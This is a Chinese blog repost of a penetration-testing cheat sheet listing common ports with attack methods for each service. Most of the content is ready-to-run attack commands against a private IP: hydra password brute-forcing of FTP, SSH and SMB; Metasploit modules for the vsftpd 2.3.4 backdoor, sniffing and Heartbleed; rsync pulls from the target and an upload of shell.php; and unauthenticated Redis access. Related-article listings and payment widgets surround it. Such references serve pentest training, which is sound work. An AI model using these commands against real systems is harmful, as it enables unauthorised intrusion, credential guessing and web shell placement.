常见端口渗透

最新推荐文章于 2024-05-11 01:06:36 发布
最新推荐文章于 2024-05-11 01:06:36 发布
阅读量794 收藏 11
点赞数 1
文章标签: 运维 数据库 java
原文链接:http://www.cnblogs.com/wintrysec/p/10875185.html
版权

常见端口和服务

端口说明攻击方法
21FTP-文件传输协议弱口令、爆破、嗅探、后门
22ssh-安全隧道远程登陆弱口令、爆破
23telnet-远程连接弱口令、爆破、嗅探
25smtp-简单邮件传输协议邮件伪造
53domain-DNS域名解析服务DNS劫持、缓存投毒
80/443http服务常见Web漏洞、IIS写文件、OpenSSL
139Samba服务爆破、远程代码执行
445局域网共享ms-17010漏洞(Win7及之前版本)
873Rsync远程代码执行
1433MSSQL数据库爆破、SQL注入
2049NFS未授权访问
3306MySQL数据库爆破、SQL注入
3389rdp-远程桌面连接爆破、漏洞ms12-020
5432postgresql爆破、注入
5632Pcanywhere拒绝服务等漏洞、爆破
5900VNC远程登陆爆破、认证绕过
6379Redis未授权访问
7001/7002weblogicJava反序列化漏洞
9990jboss远程代码执行、Java反序列化

攻击方向

21(FTP)

默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)

爆破:
#anonymous匿名登陆
#弱口令    用户名:FTP 密码:FTP或为空或爆破
hydra -l FTP -P top10000.txt ftp://192.168.115.136
嗅探:

Ettercap(内网神器)

或msf模块

use auxiliary/sniffer/psnuffle
后门:

在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾

服务器就会在6200端口监听,并且能够执行任意代码(root)

use exploit/unix/ftp/vsftpd_234_backdoor
22(SSH)

爆破:

#可以采用上边那种或以下这种写法
hydra -l root -P top10000.txt 192.168.115.136 ssh -v
53(DNS)

内网使用Ettercap进行DNS劫持,钓鱼攻击

公网的话要能控制运营商网关

139(Smb)
爆破:
hydra -l root -P top10000.txt 192.168.115.136 smb -v
远程代码执行:

CVE-2015-0240

CVE-2017-7494

443(https)

检测:

心脏滴血在线检测

nmap -sV -p 8443 --script ssl-heartbleed 192.168.115.136

利用:

use auxiliary/scanner/ssl/openssl_heartbleed
873(Rsync)

未授权访问:

rsync -avz ip::wwwroot/目录   /root/  #下载目标主机上的文件到本机root目录
rsync -avz shell.php 192.168.3.xxx::wwwroot #上传文件
2049(NFS)

未授权访问

列出导出文件夹:

use auxiliary/scanner/nfs/nfsmount
6379(Redis)

未授权访问:

#没有密码,直接连接
redis-cli -h 192.168.115.136
#Redis命令
>info #查看主机信息

Redis未授权访问总结(1)

Redis未授权访问总结(2)

7001/7002(weblogic)

反序列化:CVE-2017-3248

 

转载于:https://www.cnblogs.com/wintrysec/p/10875185.html

weixin_34327761
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见服务端口渗透剖析视频教程
07-23
教程名称:常见服务端口渗透剖析视频教程课程目录:【】1521、3306端口渗透剖析【】23端口渗透剖析【】4899端口渗透剖析【】53端口渗透剖析【】5631、5900端口渗透剖析 资源太大,传百度网盘了,链接在附件中,有...
oracle数据库连接 端口号,oracle数据库常用端口号 | 旺旺知识库
weixin_30877689的博客
04-02 667
Port Number Component21 Oracle Files - FTP (default value)110 Oracle Email - POP119 Oracle Email - NNTP139 Oracle Files - SMB389 LDAP (Oracle Internet Directory)548 Oracle Files - AFP563 Oracle Email ...
远程控制学习
m0_64845603的博客
05-10 340
远程控制程序基础,远程控制程序:被控端 + 主控端及部分工具的使用
2024年攻击端口渗透剖析_135端口渗透,搜狐新闻客户端网络安全面试题
最新发布
2401_84264630的博客
05-11 1112
(https://www.seebug.org/vuldb/ssvid-96718)(2)使用DNS欺骗攻击,可对DNS域名服务器进行欺骗,如果黑客再配合网页木马进行挂马攻击,无疑是一种杀伤力很强的攻击,黑客可不费吹灰之力就控制内网的大部分主机。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。(1)查找存在RPC溢出的主机,进行远程溢出攻击,直接获得系统权限。
Kali渗透测试-远程控制:6200端口变成“后门”
Liu_Bruce的博客
05-06 3070
Kali渗透测试-远程控制:6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
端口
LP9127的博客
06-24 852
一、端口的概念 端口是设备与外部通讯交流的接口,一般端口可以分为虚拟端口和物理端口,虚拟端口就是计算机或者交换机路由器内部的接口,一般不可见,而物理端口一般是可见的。 二、端口的类型 1、硬件端口 CPU通过接口寄存器与外部设备进行数据传送,这些硬件寄存器就称为端口或者接口。 2、软件端口 一般指网络中面向连接(TCP)和无连接(UDP)的通信协议端口,包括数据I/O和缓冲区。 (1)
黑客常用端口利用总结
qq_43233085的博客
11-06 1325
黑客常用端口利用总结21:ftp/tftp/vsftpd文件传输协议22:ssh远程连接23:Telnet远程连接25/465:SMTP邮件服务53:DNS域名解析系统80/443:http/https135:DCOM服务139/445:Samba服务1433/1434:SQL Server服务1521:Oracle2049:NFS服务3306:mysql3389:Rdp远程桌面链接4899:ra...
渗透测试常见端口以及攻击方向
11-22
渗透测试常见端口以及攻击方向,从服务类型,端口号,端口说明,攻击方向四个层面对常见端口号进行深度剖析,觉得还不错的话给博主点个关注吧
渗透测试思路篇_常见端口及利用方式1
08-03
①使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件 ②是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等 ①
端口快速扫描工具珍藏版
12-06
常见端口如HTTP(80)、HTTPS(443)、FTP(21)、SSH(22)等,这些端口的开放意味着相应的服务正在监听并可能接受连接。 端口扫描是网络安全分析的基石,通过扫描,我们可以获取以下信息: 1. **系统识别**:...
内网渗透常见端口转发方式 作者:倾旋.pdf
04-08
内网渗透常见端口转发方式 作者:倾旋
渗透测试】vulnstack2-渗透思路养成!
m0_74272345的博客
10-01 276
花了一个下午到晚上十点的时间,尽量不借助WP试着打了一次(但还是略看了一点),目的是想形成自己的方法论和渗透思路。但很明显思路还不成熟,不够熟练。这是第二次打vulnstack2,上次还是6月份的时候,这次选择了纯MSF打法,仍然暴露出MSF的一些局限性,还是要配合CS来打本次未完成的两个问题横向移动到PC黄金票据生成(上次纯CS打法是解决了这个问题的)
渗透测试中的常见端口
weixin_47660694的博客
12-09 542
渗透测试中的常见端口
内网渗透笔记——:)一个笑脸
wang_zui_zui的博客
03-01 5262
打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.http://www.vulnhub.co
常见的默认端口
weixin_34223655的博客
09-01 1839
参考文献:http://www.wusiwei.com/?post=109 ftp:21//默认的数据和命令传输端口[可明文亦可加密传输] 允许匿名的上传下载,爆破,嗅探,win提权,远程执行(proftpd 1.3.5),各类后门(proftpd,vsftp 2.3.4) ssh:22//可根据已搜集到的...
端口及对应服务
weixin_44791884的博客
02-09 846
端口及对应服务 TCP端口(静态端口) TCP 0= Reserved TCP 1=TCP Port Service Multiplexer TCP 2=Death TCP 5=Remote Job Entry,yoyo TCP 7=Echo TCP 11=Skun TCP 12=Bomber TCP 16=Skun TCP 17=Skun TCP 18=消息传输协议,skun TCP 19=Sk...
渗透测试中的端口利用
原味瓜子、的博客
09-24 2392
文章目录端口渗透图解详解端口渗透 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务服务可能对应的漏洞。 端口渗透图解 详解端口渗透 文件共享端口渗透 FTP服务 FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等。 默认端口 20(
端口的分类
KOwzb的博客
06-18 514
端口号的范围是从1~65535 端口的概念:  在网络技术中,端口(Port)大致有两种意思:一是物理意义上的端口,比如,ADSL Modem、集线器、交换机、路由器用于连接其他网络设备的接口,如RJ-45端口、SC端口等等。二是逻辑意义上的端口,一般是指TCP/IP协议中的端口端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。
内网渗透-weblogic中间件系列漏洞
爱上卿的博客
01-25 2176
weblogic WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。   (1)WebLogic...
渗透测试中常见默认端口
04-05
以下是一些常见的默认端口,这些端口经常被用于渗透测试: 1. SSH (22) 2. Telnet (23) 3. FTP (21) 4. HTTP (80) 5. HTTPS (443) 6. DNS (53) 7. SMTP (25) 8. POP3 (110) 9. IMAP (143) 10. MySQL (3306) 11. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值